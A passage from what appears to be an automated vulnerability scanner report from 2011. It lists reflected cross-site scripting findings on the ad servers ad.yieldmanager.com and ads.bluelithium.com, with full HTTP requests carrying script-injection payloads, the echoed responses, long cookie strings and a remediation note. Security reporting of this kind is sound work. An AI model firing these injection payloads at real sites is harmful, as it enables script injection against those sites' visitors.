User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:38 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Content-Length: 334
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" height="100%" width="100%" src="http://ad.yieldmanager.com/5fcde"><script>alert(1)</script>44f1c8c103a">
...[SNIP]...

2.4. http://ad.yieldmanager.com/rw [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /rw

Issue detail

The value of the title request parameter is copied into the HTML document as text between TITLE tags. The payload 64f21</title><script>alert(1)</script>64b9de015e6 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw?title=64f21</title><script>alert(1)</script>64b9de015e6&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Content-Length: 831
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title>64f21</title><script>alert(1)</script>64b9de015e6</title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true" scrollin
...[SNIP]...

2.5. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6a5f"-alert(1)-"1c9c4bb1a71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=541&anprice=&ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400&b6a5f"-alert(1)-"1c9c4bb1a71=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#d!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:40 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:40 GMT
Pragma: no-cache
Content-Length: 4413
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_pop_frequency = 86400; rm_pop_times = 1; rm_pop_id = 1620509; rm_tag_type = "pop"; rm_url = "http://ad.yieldmanager.com/imp?Z=0x0&anmember=541&anprice=&b6a5f"-alert(1)-"1c9c4bb1a71=1&y=29&s=1620509&_salt=192209607";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array()
...[SNIP]...

2.6. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb233"-alert(1)-"19d71a463a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409&fb233"-alert(1)-"19d71a463a=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:50 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:49:50 GMT
Pragma: no-cache
Content-Length: 4667
Age: 0
Proxy-Connection: close

